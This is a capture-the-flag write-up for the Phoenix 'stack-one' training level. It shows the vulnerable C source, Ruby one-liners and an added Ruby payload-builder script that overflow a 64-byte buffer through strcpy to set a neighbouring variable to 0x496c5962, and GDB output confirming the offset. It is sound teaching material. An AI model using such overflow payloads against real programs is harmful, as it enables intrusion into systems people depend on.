
(Write-up) Phoenix :: Stack One

Aibhstin ・2 min read

The source code for this challenge is given as the following:

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  if (argc < 2) {
    errx(1, "specify an argument, to be copied into the \"buffer\"");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, argv[1]);

  if (locals.changeme == 0x496c5962) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Getting closer! changeme is currently 0x%08x, we want 0x496c5962\n",
        locals.changeme);
  }

  exit(0);
}

This time, we have to set the variable to a specific hexadecimal value; simply altering it isn't enough. The program is functionally the same as the previous level, so we'll use the same Ruby one-liner as the base. The struct places changeme directly after the 64-byte buffer, so 64 'A's fill the buffer exactly and the 65th byte lands in changeme. With exactly 64 'A's only strcpy's terminating NUL spills over, which leaves changeme at zero; with 65, the extra 0x41 appears in the low byte of changeme, because x86-64 is little-endian and the least significant byte sits at the lowest address:

user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-one `ruby -e 'puts "A" * 64'`
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Getting closer! changeme is currently 0x00000000, we want 0x496c5962
user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-one `ruby -e 'puts "A" * 65'`
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Getting closer! changeme is currently 0x00000041, we want 0x496c5962

So the four bytes that overwrite changeme have to spell out 0x496c5962 in little-endian order, least significant byte first: 62 59 6c 49. The Ruby one-liner below does that reversal by hand with pack("H*") and redirects the result into a file, which can then be passed as the argument to trigger the exploit. (puts appends a newline, but the shell's command substitution strips trailing newlines, so it does no harm here.)

user@phoenix-amd64:/opt/phoenix/amd64$ ruby -e 'puts "A" * 64 + ["62596c49"].pack("H*")' > /tmp/stack-one-out
user@phoenix-amd64:/opt/phoenix/amd64$ cat /tmp/stack-one-out 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbYlI
user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-one `cat /tmp/stack-one-out`
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value
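Reversing the hex string by hand works, but the more general approach for this and later levels is to let Ruby's pack("V") produce the little-endian bytes from the integer you actually want. The script below is an added example for this write-up, not the original one-liner or the challenge's own code. It assumes the struct layout from the source above (64-byte buffer immediately followed by the 4-byte int changeme, no padding) and an x86-64 little-endian target, and it also deals with the NUL-byte limitation of strcpy and argv that the one-liner ignores. The file name stack_one_payload.rb is just a suggestion.

```ruby
# Added example: a payload builder for stack-one, written for this write-up,
# not the challenge's own code. Assumes the struct layout from the source
# above (char buffer[64] directly followed by int changeme, no padding) and a
# little-endian target, which phoenix-amd64 is.

BUFFER_SIZE = 64          # sizeof(locals.buffer) in the challenge source
TARGET      = 0x496c5962  # value main() compares changeme against

# Filler up to changeme, then the target packed as a little-endian 32-bit
# unsigned int. pack("V") does the byte reversal that the one-liner does by
# hand with ["62596c49"].pack("H*"): you pass the value, not its reversed hex.
def build_payload(target = TARGET, filler = "A", buffer_size = BUFFER_SIZE)
  # changeme is zeroed before strcpy and strcpy writes a NUL terminator, so
  # zero high-order bytes need not be in the payload at all; that is how
  # 65 'A's produced 0x00000041 above. Trim them instead of trying to pass NULs.
  packed = [target].pack("V").sub(/\x00+\z/n, "")
  (filler * buffer_size) + packed
end

# Read changeme back the way the CPU will: the bytes that spill past the
# buffer, padded with the zeros already in the variable, interpreted
# little-endian. Lets you check a payload before it touches the binary.
def changeme_from(payload, buffer_size = BUFFER_SIZE)
  spilled = payload.byteslice(buffer_size, 4) || ""
  spilled.b.ljust(4, "\x00").unpack1("V")
end

# strcpy() stops at the first NUL byte, and argv cannot carry one anyway, so a
# payload with an embedded NUL is truncated before the rest reaches changeme.
# A target such as 0x41004142 can therefore not be set through this bug.
def deliverable?(payload)
  !payload.bytes.include?(0)
end

if __FILE__ == $PROGRAM_NAME
  payload = build_payload
  abort "payload contains an embedded NUL and cannot be passed via argv" unless deliverable?(payload)
  # Progress goes to stderr; only the raw payload goes to stdout, so the script
  # drops straight into a command substitution with no trailing newline.
  $stderr.printf("%d bytes, changeme will read 0x%08x\n", payload.bytesize, changeme_from(payload))
  $stdout.write(payload)
end
```

Run it as ./stack-one "$(ruby stack_one_payload.rb)". Command substitution hands the bytes over as argv[1], and because nothing but the payload is written to stdout there is no newline to strip. To set a different value, call build_payload with it, or change TARGET; deliverable? tells you up front whether strcpy will ever copy it in full.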

The benefit of setting it to a distinctive value like this is that it stands out immediately when we examine the stack in GDB, so we can see exactly where the overflow lands.

(gdb) x/40xw $rsp
0x7fffffffe5a0: 0xffffe658      0x00007fff      0x00000000      0x00000002
0x7fffffffe5b0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe5c0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe5d0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe5e0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe5f0: 0x496c5962      0x00000000      0x00000000      0x00000000
0x7fffffffe600: 0x00000002      0x00000000      0xf7d8fd62      0x00007fff
0x7fffffffe610: 0x00000000      0x00000000      0xffffe650      0x00007fff
0x7fffffffe620: 0x00000000      0x00000000      0xf7ffdbc8      0x00007fff
0x7fffffffe630: 0x00003e00      0x04000001      0x00400539      0x00000000

We see our value at 0x7fffffffe5f0, so that is the address of changeme. The 64 bytes of 0x41 immediately before it, from 0x7fffffffe5b0 to 0x7fffffffe5ef, are the buffer, which confirms the 64-byte offset between the start of the buffer and the variable we overwrite. The absolute addresses can differ from run to run, especially as environment variables are stored on the stack and shift everything, but the offset is fixed by the struct layout, and that offset is all the exploit depends on.
